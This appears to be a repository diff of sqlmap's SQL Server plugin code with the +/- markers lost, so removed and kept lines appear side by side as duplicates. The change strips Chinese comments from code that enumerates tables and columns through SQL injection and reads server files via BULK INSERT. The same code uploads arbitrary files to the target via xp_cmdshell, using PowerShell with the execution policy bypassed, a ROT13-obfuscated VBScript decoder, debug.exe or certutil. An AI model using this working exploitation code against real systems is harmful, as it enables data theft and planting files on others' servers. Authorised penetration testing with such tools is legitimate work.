continue
indexRange = getLimitRange(count) # 生成索引范围
indexRange = getLimitRange(count)
# 遍历表索引,获取每个表名
for index in indexRange:
query = rootQuery.blind.query
query = query.replace("%s", db)
query += " AND %s" % tblQuery
query = agent.limitQuery(index, query, tblCond)
tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl
foundTbls[db].append(tbl)
# 清理空的数据库表列表
for db, tbls in list(foundTbls.items()):
if len(tbls) == 0:
foundTbls.pop(db)
# 如果没有找到任何表,则输出警告信息
if not foundTbls:
warnMsg = "no databases contain any of the provided tables"
logger.warning(warnMsg)
return
conf.dumper.dbTables(foundTbls) # 将找到的表信息输出到文件
self.dumpFoundTables(foundTbls) # 输出找到的表信息
conf.dumper.dbTables(foundTbls)
self.dumpFoundTables(foundTbls)
# 定义 searchColumn 方法,用于搜索指定的列
def searchColumn(self):
rootQuery = queries[DBMS.MSSQL].search_column # 获取 SQL Server 的列搜索查询语句
foundCols = {} # 初始化找到的列字典
dbs = {} # 初始化数据库字典
whereTblsQuery = "" # 初始化表 WHERE 条件
infoMsgTbl = "" # 初始化表信息
infoMsgDb = "" # 初始化数据库信息
colList = conf.col.split(',') # 获取要搜索的列列表
# 如果配置中指定了排除的列,则跳过
rootQuery = queries[DBMS.MSSQL].search_column
foundCols = {}
dbs = {}
whereTblsQuery = ""
infoMsgTbl = ""
infoMsgDb = ""
colList = conf.col.split(',')
if conf.exclude:
colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None]
origTbl = conf.tbl # 保存原始的表配置
origDb = conf.db # 保存原始的数据库配置
colCond = rootQuery.inband.condition # 获取列搜索条件
tblCond = rootQuery.inband.condition2 # 获取表搜索条件
colConsider, colCondParam = self.likeOrExact("column") # 获取列搜索的方式 (LIKE 或 EXACT)
origTbl = conf.tbl
origDb = conf.db
colCond = rootQuery.inband.condition
tblCond = rootQuery.inband.condition2
colConsider, colCondParam = self.likeOrExact("column")
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则分割数据库字符串,否则获取所有数据库
if conf.db:
enumDbs = conf.db.split(',')
elif not len(kb.data.cachedDbs):
@ -355,36 +303,30 @@ class Enumeration(GenericEnumeration):
else:
enumDbs = kb.data.cachedDbs
# 初始化每个数据库的列搜索结果
for db in enumDbs:
db = safeSQLIdentificatorNaming(db)
dbs[db] = {}
# 遍历要搜索的列列表
for column in colList:
column = safeSQLIdentificatorNaming(column) # 安全命名列名
conf.db = origDb # 恢复原始的数据库配置
conf.tbl = origTbl # 恢复原始的表配置
column = safeSQLIdentificatorNaming(column)
conf.db = origDb
conf.tbl = origTbl
# 输出搜索列信息的提示信息
infoMsg = "searching column"
if colConsider == "1":
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {} # 初始化每个列的搜索结果
foundCols[column] = {}
# 如果配置中指定了表,则构建表的 WHERE 条件
if conf.tbl:
_ = conf.tbl.split(',')
whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")"
infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _))
# 如果配置中指定了当前数据库,则获取当前数据库
if conf.db == CURRENT_DB:
conf.db = self.getCurrentDb()
# 如果配置中指定了数据库,则构建数据库信息,否则获取所有数据库
if conf.db:
_ = conf.db.split(',')
infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _))
@ -395,35 +337,30 @@ class Enumeration(GenericEnumeration):
logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb))
# 构建列搜索查询条件
colQuery = "%s%s" % (colCond, colCondParam)
colQuery = colQuery % unsafeSQLIdentificatorNaming(column)
# 遍历数据库列表
for db in (_ for _ in dbs if _):
db = safeSQLIdentificatorNaming(db) # 安全命名数据库名
db = safeSQLIdentificatorNaming(db)
# 如果配置中排除了系统数据库,则跳过
if conf.excludeSysDbs and db in self.excludeDbsList:
continue
# 如果配置中指定了排除的数据库,则跳过
if conf.exclude and re.search(conf.exclude, db, re.I) is not None:
continue
# 检查是否可以使用 UNION、ERROR、QUERY 注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
query = rootQuery.inband.query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db)
values = inject.getValue(query, blind=False, time=False) # 执行注入并获取结果
# 如果获取到了列信息,则进行处理
values = inject.getValue(query, blind=False, time=False)
if not isNoneValue(values):
if isinstance(values, six.string_types):
values = [values]
for foundTbl in values:
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) # 安全命名表名
foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True)
if foundTbl is None:
continue
@ -436,7 +373,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = foundTbl
conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
if db in kb.data.cachedColumns and foundTbl in kb.data.cachedColumns[db] and not isNoneValue(kb.data.cachedColumns[db][foundTbl]):
dbs[db][foundTbl].update(kb.data.cachedColumns[db][foundTbl])
@ -449,11 +386,9 @@ class Enumeration(GenericEnumeration):
foundCols[column][db].append(foundTbl)
else:
foundCols[column][db] = [foundTbl]
# 如果无法使用上述注入,则使用推断注入搜索列信息
else:
foundCols[column][db] = []
# 输出获取包含该列的表数量的提示信息
infoMsg = "fetching number of tables containing column"
if colConsider == "1":
infoMsg += "s LIKE"
@ -464,9 +399,8 @@ class Enumeration(GenericEnumeration):
query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db)
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 执行推断注入并获取结果
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
# 如果没有获取到有效的表数量,则跳过
if not isNumPosStrValue(count):
warnMsg = "no tables contain column"
if colConsider == "1":
@ -477,19 +411,18 @@ class Enumeration(GenericEnumeration):
continue
indexRange = getLimitRange(count) # 生成索引范围
indexRange = getLimitRange(count)
# 遍历表索引,获取每个表名
for index in indexRange:
query = rootQuery.blind.query
query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db)
query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
tbl = inject.getValue(query, union=False, error=False) # 执行推断注入并获取结果
tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True) # 安全命名表名
tbl = safeSQLIdentificatorNaming(tbl, True)
if tbl not in dbs[db]:
dbs[db][tbl] = {}
@ -499,7 +432,7 @@ class Enumeration(GenericEnumeration):
conf.tbl = tbl
conf.col = column
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False) # 获取列信息
self.getColumns(onlyColNames=True, colTuple=(colConsider, colCondParam), bruteForce=False)
if db in kb.data.cachedColumns and tbl in kb.data.cachedColumns[db]:
dbs[db][tbl].update(kb.data.cachedColumns[db][tbl])
@ -507,7 +440,7 @@ class Enumeration(GenericEnumeration):
else:
dbs[db][tbl][column] = None
foundCols[column][db].append(tbl) # 将找到的表添加到结果中
foundCols[column][db].append(tbl)
conf.dumper.dbColumns(foundCols, colConsider, dbs) # 将找到的列信息输出到文件
self.dumpFoundColumn(dbs, foundCols, colConsider) # 输出找到的列信息
conf.dumper.dbColumns(foundCols, colConsider, dbs)
self.dumpFoundColumn(dbs, foundCols, colConsider)

235
src/sqlmap-master/plugins/dbms/mssqlserver/filesystem.py
Unescape View File

@ -5,81 +5,75 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入必要的模块
import ntpath # 导入 ntpath 模块,用于处理 Windows 路径
import os # 导入 os 模块,用于执行操作系统相关操作
from lib.core.common import checkFile # 导入 checkFile 函数,用于检查文件是否存在
from lib.core.common import getLimitRange # 导入 getLimitRange 函数,用于生成限制范围
from lib.core.common import isNumPosStrValue # 导入 isNumPosStrValue 函数,用于检查值是否为正数字字符串
from lib.core.common import isTechniqueAvailable # 导入 isTechniqueAvailable 函数,用于检查指定的注入技术是否可用
from lib.core.common import posixToNtSlashes # 导入 posixToNtSlashes 函数,用于将 POSIX 路径转换为 NT 路径
from lib.core.common import randomStr # 导入 randomStr 函数,用于生成随机字符串
from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.compat import xrange # 导入 xrange 函数,用于兼容 Python 2 和 3 的循环
from lib.core.convert import encodeBase64 # 导入 encodeBase64 函数,用于 Base64 编码
from lib.core.convert import encodeHex # 导入 encodeHex 函数,用于十六进制编码
from lib.core.convert import rot13 # 导入 rot13 函数,用于 ROT13 编码
from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.core.exception import SqlmapUnsupportedFeatureException # 导入 SqlmapUnsupportedFeatureException 异常类,用于表示不支持的功能
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 导入 GenericFilesystem 类,作为当前类的父类
# 定义 Filesystem 类,继承自 GenericFilesystem
import ntpath
import os
from lib.core.common import checkFile
from lib.core.common import getLimitRange
from lib.core.common import isNumPosStrValue
from lib.core.common import isTechniqueAvailable
from lib.core.common import posixToNtSlashes
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.compat import xrange
from lib.core.convert import encodeBase64
from lib.core.convert import encodeHex
from lib.core.convert import rot13
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.request import inject
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
# 定义 _dataToScr 方法,用于将数据转换为 debug.exe 脚本
def _dataToScr(self, fileContent, chunkName):
fileLines = [] # 初始化文件行列表
fileSize = len(fileContent) # 获取文件大小
lineAddr = 0x100 # 设置起始地址
lineLen = 20 # 设置每行长度
fileLines = []
fileSize = len(fileContent)
lineAddr = 0x100
lineLen = 20
fileLines.append("n %s" % chunkName) # 添加 debug.exe 的 'n' 命令,用于设置文件名
fileLines.append("rcx") # 添加 debug.exe 的 'rcx' 命令,用于设置寄存器 cx
fileLines.append("%x" % fileSize) # 添加文件大小
fileLines.append("f 0100 %x 00" % fileSize) # 添加 debug.exe 的 'f' 命令,用于填充内存
fileLines.append("n %s" % chunkName)
fileLines.append("rcx")
fileLines.append("%x" % fileSize)
fileLines.append("f 0100 %x 00" % fileSize)
# 遍历文件内容,将每一行转换为 debug.exe 的 'e' 命令
for fileLine in xrange(0, len(fileContent), lineLen):
scrString = "" # 初始化每行字符串
scrString = ""
for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = encodeHex(lineChar, binary=False) # 将字符转换为十六进制字符串
strLineChar = encodeHex(lineChar, binary=False)
if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar) # 如果是第一个字符,则添加 'e' 命令
scrString = "e %x %s" % (lineAddr, strLineChar)
else:
scrString += " %s" % strLineChar # 添加字符
scrString += " %s" % strLineChar
lineAddr += len(strLineChar) // 2 # 更新地址
lineAddr += len(strLineChar) // 2
fileLines.append(scrString) # 添加到文件行列表
fileLines.append(scrString)
fileLines.append("w") # 添加 debug.exe 的 'w' 命令,用于写入文件
fileLines.append("q") # 添加 debug.exe 的 'q' 命令,用于退出 debug.exe
fileLines.append("w")
fileLines.append("q")
return fileLines # 返回文件行列表
return fileLines
# 定义 _updateDestChunk 方法,用于更新目标文件的 chunk
def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True) # 生成随机的 debug.exe 脚本文件名
chunkName = randomStr(lowercase=True) # 生成随机的 chunk 文件名
fileScrLines = self._dataToScr(fileContent, chunkName) # 将文件内容转换为 debug.exe 脚本
randScr = "tmpf%s.scr" % randomStr(lowercase=True)
chunkName = randomStr(lowercase=True)
fileScrLines = self._dataToScr(fileContent, chunkName)
logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) # 使用 xp_cmdshell 将 debug.exe 脚本写入到服务器
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr)
logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr))
# 执行 debug.exe 脚本,生成 chunk 文件
commands = (
"cd \"%s\"" % tmpPath,
"debug < %s" % randScr,
@ -88,26 +82,25 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
return chunkName # 返回 chunk 文件名
return chunkName
# 定义 stackedReadFile 方法,用于读取服务器文件内容,使用堆叠查询
def stackedReadFile(self, remoteFile):
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
result = [] # 初始化结果列表
txtTbl = self.fileTblName # 获取文件表名
hexTbl = "%s%shex" % (self.fileTblName, randomStr()) # 生成十六进制表名
result = []
txtTbl = self.fileTblName
hexTbl = "%s%shex" % (self.fileTblName, randomStr())
self.createSupportTbl(txtTbl, self.tblField, "text") # 创建支持表,用于存储文件内容
inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) # 创建十六进制表
self.createSupportTbl(txtTbl, self.tblField, "text")
inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % remoteFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) # 使用 BULK INSERT 将文件内容读取到支持表
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True)
# 将二进制数据转换为十六进制字符串的 SQL 查询
# Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096)
@ -146,76 +139,67 @@ class Filesystem(GenericFilesystem):
END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\
", " ") # 移除多余空格和换行符
inject.goStacked(binToHexQuery) # 执行 SQL 查询,将二进制数据转换为十六进制字符串
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ")
inject.goStacked(binToHexQuery)
# 如果可以使用 UNION 注入,则直接读取十六进制表
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
# 如果无法使用 UNION 注入,则使用推断注入来读取十六进制表
if not result:
result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取十六进制表的行数
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % remoteFile
raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count) # 生成索引范围
indexRange = getLimitRange(count)
# 遍历索引范围,逐行读取十六进制数据
for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
inject.goStacked("DROP TABLE %s" % hexTbl)
return result # 返回读取的文件内容
return result
# 定义 unionWriteFile 方法,用于使用 UNION 注入写入文件,但此方法不支持 SQL Server
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg)
# 定义 _stackedWriteFilePS 方法,用于使用 PowerShell 写入文件内容
def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s'" % remoteFile
logger.info(infoMsg)
encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的 Base64 文件名
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) # 构建 Base64 文件路径
encodedFileContent = encodeBase64(localFileContent, binary=False)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) # 生成随机的 PowerShell 脚本文件名
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) # 构建 PowerShell 脚本路径
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
localFileSize = len(encodedFileContent) # 获取 Base64 编码后的文件大小
chunkMaxSize = 1024 # 设置最大 chunk 大小
localFileSize = len(encodedFileContent)
chunkMaxSize = 1024
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
# 循环上传 Base64 编码后的文件内容
for i in xrange(0, localFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
# 构建 PowerShell 脚本
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) # 使用 xp_cmdshell 将 PowerShell 脚本写入到服务器
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
# 执行 PowerShell 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
commands = (
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath,
@ -224,26 +208,23 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileDebugExe 方法,用于使用 debug.exe 写入文件内容
def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg)
remoteFileName = ntpath.basename(remoteFile) # 获取远程文件名
sFile = "%s\\%s" % (tmpPath, remoteFileName) # 构建远程文件路径
localFileSize = os.path.getsize(localFile) # 获取本地文件大小
debugSize = 0xFF00 # 设置 debug.exe 的最大写入大小
remoteFileName = ntpath.basename(remoteFile)
sFile = "%s\\%s" % (tmpPath, remoteFileName)
localFileSize = os.path.getsize(localFile)
debugSize = 0xFF00
# 如果文件小于 debug.exe 的最大写入大小,则直接写入
if localFileSize < debugSize:
chunkName = self._updateDestChunk(localFileContent, tmpPath) # 将文件内容转换为 debug.exe 脚本并生成 chunk 文件
chunkName = self._updateDestChunk(localFileContent, tmpPath)
debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
logger.debug(debugMsg)
# 将 chunk 文件重命名为目标文件名并移动到目标路径
commands = (
"cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, remoteFileName),
@ -251,7 +232,6 @@ class Filesystem(GenericFilesystem):
)
self.execCmd(" & ".join(command for command in commands))
# 如果文件大于 debug.exe 的最大写入大小,则分块写入
else:
debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload "
@ -259,12 +239,10 @@ class Filesystem(GenericFilesystem):
debugMsg += "on the server, please wait.."
logger.debug(debugMsg)
# 循环分块写入文件
for i in xrange(0, localFileSize, debugSize):
localFileChunk = localFileContent[i:i + debugSize] # 获取文件 chunk
chunkName = self._updateDestChunk(localFileChunk, tmpPath) # 将文件 chunk 转换为 debug.exe 脚本并生成 chunk 文件
localFileChunk = localFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(localFileChunk, tmpPath)
# 如果是第一个 chunk则重命名否则合并 chunk
if i == 0:
debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, remoteFileName)
@ -275,7 +253,6 @@ class Filesystem(GenericFilesystem):
debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
logger.debug(debugMsg)
# 执行重命名或合并操作
commands = (
"cd \"%s\"" % tmpPath,
copyCmd,
@ -286,7 +263,6 @@ class Filesystem(GenericFilesystem):
logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
# 将合并后的文件移动到目标路径
commands = (
"cd \"%s\"" % tmpPath,
"move /Y %s %s" % (remoteFileName, remoteFile)
@ -294,17 +270,15 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileVbs 方法,用于使用 VBScript 写入文件内容
def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True) # 生成随机的 VBScript 文件名
randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的临时文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建临时文件路径
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\\%s" % (tmpPath, randFile)
# 构建 VBScript 脚本
vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu
vachgSvyrCngu = "%f"
bhgchgSvyrCngu = "%f"
@ -360,17 +334,18 @@ class Filesystem(GenericFilesystem):
Raq Shapgvba"""
# NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581
vbs = rot13(vbs) # 对 VBScript 脚本进行 ROT13 编码
vbs = vbs.replace(" ", "") # 移除多余空格
encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
vbs = rot13(vbs)
vbs = vbs.replace(" ", "")
encodedFileContent = encodeBase64(localFileContent, binary=False)
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) # 使用 xp_cmdshell 将 VBScript 脚本写入到服务器
# 执行 VBScript 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = (
"cd \"%s\"" % tmpPath,
"cscript //nologo %s" % randVbs,
@ -380,28 +355,26 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileCertutilExe 方法,用于使用 certutil.exe 写入文件内容
def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg)
chunkMaxSize = 500 # 设置最大 chunk 大小
chunkMaxSize = 500
randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建文件路径
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\\%s" % (tmpPath, randFile)
encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
encodedFileContent = encodeBase64(localFileContent, binary=False)
splittedEncodedFileContent = '\
'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) # 分块 Base64 编码文件内容
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将分块 Base64 编码后的文件内容写入到服务器
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
logger.debug("decoding the file to %s.." % remoteFile)
# 执行 certutil.exe 命令,将 Base64 编码后的文件内容解码并写入到目标文件
commands = (
"cd \"%s\"" % tmpPath,
"certutil -f -decode %s %s" % (randFile, remoteFile),
@ -410,7 +383,6 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands))
# 定义 stackedWriteFile 方法,用于使用堆叠查询写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
@ -418,16 +390,15 @@ class Filesystem(GenericFilesystem):
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath) # 获取临时路径并转换为 NT 路径
remoteFile = posixToNtSlashes(remoteFile) # 将远程文件名转换为 NT 路径
tmpPath = posixToNtSlashes(conf.tmpPath)
remoteFile = posixToNtSlashes(remoteFile)
checkFile(localFile) # 检查本地文件是否存在
localFileContent = open(localFile, "rb").read() # 读取本地文件内容
checkFile(localFile)
localFileContent = open(localFile, "rb").read()
self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) # 尝试使用 PowerShell 写入文件
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) # 询问是否成功写入
self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 PowerShell 写入失败,则尝试使用 VBScript 写入文件
if written is False:
message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] "
@ -436,7 +407,6 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 VBScript 写入失败,则尝试使用 debug.exe 写入文件
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] "
@ -445,7 +415,6 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 debug.exe 写入失败,则尝试使用 certutil.exe 写入文件
if written is False:
message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] "
@ -454,4 +423,4 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
return written # 返回是否成功写入
return written

195
src/sqlmap-master/plugins/dbms/mssqlserver/fingerprint.py
Unescape View File

@ -5,96 +5,89 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
# 导入必要的模块
from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
